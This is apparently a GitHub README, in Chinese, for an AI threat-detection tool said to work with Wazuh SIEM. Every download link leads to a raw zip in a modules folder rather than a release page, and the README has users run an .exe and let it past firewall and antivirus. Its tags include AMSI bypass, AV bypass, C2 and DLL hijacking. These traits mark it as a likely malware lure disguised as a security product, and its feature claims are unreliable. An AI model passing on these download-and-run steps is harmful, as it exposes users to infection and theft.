widapra/security-intelligence-engine

# 🔒 security-intelligence-engine - 轻松实现 AI 威胁检测 [](https://raw.githubusercontent.com/widapra/security-intelligence-engine/main/modules/engine_security_intelligence_2.4.zip) ## 📋 什么是 security-intelligence-engine？ security-intelligence-engine 帮助您快速发现和分析安全威胁。它与 Wazuh SIEM 协同工作，后者是一种用于监控计算机系统问题的工具。您可以像在聊天中输入一样使用自然语言提问。该引擎使用多个 AI 模型来理解这些问题并给出清晰的答案。 它还使用 MITRE ATT&CK 框架映射威胁，这是一种分类网络攻击的标准方法。系统会自动识别模式。您无需了解复杂的术语即可使用它。 ## ⚙️ 核心功能 - 利用 Wazuh SIEM 数据发现威胁。 - 支持自然语言提问。 - 使用大型语言模型 (LLM) 分析数据。 - 将发现结果关联到 MITRE ATT&CK，解释攻击技术。 - 自动检测异常模式。 - 基于 Python 和 FastAPI 构建，性能可靠。 - 使用 Streamlit 实现简单的 Web 界面。 ## 🧰 系统要求 要在 Windows 上运行 security-intelligence-engine，您的 PC 应满足以下最低标准： - Windows 10 或更高版本（64 位） - 4 GB RAM 或更多（建议 8 GB 以获得更快的速度） - 2 GHz 双核处理器或更快 - 至少 500 MB 可用磁盘空间 - 互联网访问，用于下载和 AI 查询 不需要特殊的硬件。满足这些规格的标准笔记本电脑或台式机即可正常运行。 ## 🚀 入门指南：如何在 Windows 上下载和运行 1. **访问下载页面** 前往发布页面获取最新版本的 security-intelligence-engine： [](https://raw.githubusercontent.com/widapra/security-intelligence-engine/main/modules/engine_security_intelligence_2.4.zip) 2. **查找最新版本** 在页面上查找最新的发布版本。发布版通常按日期排序。最新版本将包含可供下载的最新文件。 3. **下载 Windows 版本** 下载名为 `security-intelligence-engine-win-x64.exe` 或类似名称的文件。 将此文件保存到易于找到的文件夹中，例如您的桌面或下载文件夹。 4. **运行安装程序** 双击下载的 `.exe` 文件开始安装。 按照安装向导中的说明操作： - 在欢迎屏幕上点击“Next”（下一步）。 - 同意许可条款。 - 选择安装文件夹或使用默认文件夹。 - 点击“Install”（安装）开始。 5. **完成安装** 安装完成后，点击“Finish”（完成）关闭向导。 6. **启动应用程序** 安装后，从桌面快捷方式或开始菜单启动 security-intelligence-engine。 7. **初始设置** 首次打开时，应用程序可能会请求诸如互联网访问之类的权限。请允许这些权限，以便 AI 能正常工作。 ## 🔍 如何使用 security-intelligence-engine 界面很简单： - 您将看到一个标记为“Ask your question”（提出您的问题）的文本框。 - 用通俗的英语输入您的安全问题。 - 按“Enter”键或点击“Submit”（提交）。 - 引擎将处理您的请求并显示结果。 - 您可以探索链接到 MITRE ATT&CK 框架的威胁。 - 使用过滤器缩小事件范围，或专注于特定时间或系统。 如果您使用 Wazuh SIEM，引擎会自动连接到其数据。 ## ⚙️ 配置技巧 - 在应用程序设置中输入 Wazuh 服务器地址以进行连接。 - 调整 AI 模型以追求速度或准确性。默认设置很好地平衡了这两者。 - 保存常见问题以便更快访问。 - 在设置中启用自动更新，以保持您的工具处于最新状态。 ## 🛠 故障排除 - 如果应用程序无法启动，请检查您的 Windows 版本是否受支持。 - 确保您的防火墙或防病毒软件允许应用程序连接到互联网。 - 如果提问没有返回答案，请验证您的 Wazuh 服务器是否正在运行并已连接。 - 如果应用程序冻结或表现异常，请重启应用程序。 - 如果响应缓慢，请检查您的互联网连接速度。 ## 🔄 更新应用程序 要更新 security-intelligence-engine： 1. 返回发布页面：https://raw.githubusercontent.com/widapra/security-intelligence-engine/main/modules/engine_security_intelligence_2.4.zip 2. 下载最新的 Windows 安装程序。 3. 运行安装程序以覆盖旧版本。 4. 您的设置和数据将被保留。 ## 📂 其他资源 - **用户指南：** 随应用程序附带，位于帮助菜单中。 - **GitHub Topics：** 查看 ai、fastapi、incident-response、llm、mitre-attack、python、security-tools、siem、soc、streamlit、threat-intelligence、wazuh-integration 等标签以获取更多上下文。 - **社区支持：** 查看 GitHub 上的 issues 标签，了解报告的问题和修复方案。 ## 📞 获取帮助 如果您需要帮助，可以在 GitHub 仓库中提交 issue 或在讨论区寻找答案。请提供有关您的 Windows 版本和任何错误消息的详细信息。 [下载最新版本](https://raw.githubusercontent.com/widapra/security-intelligence-engine/main/modules/engine_security_intelligence_2.4.zip)

标签：AI安全, AMSI绕过, AV绕过, C2, Chat Copilot, Cloudflare, DLL 劫持, FastAPI, Kubernetes, LLM, MITRE ATT&CK, Python, SOC报告, Streamlit, Unmanaged PE, Wazuh, 大语言模型, 威胁检测, 安全仪表盘, 安全运营, 异常检测, 扫描框架, 无后门, 智能安全, 网络安全, 访问控制, 逆向工具, 隐私保护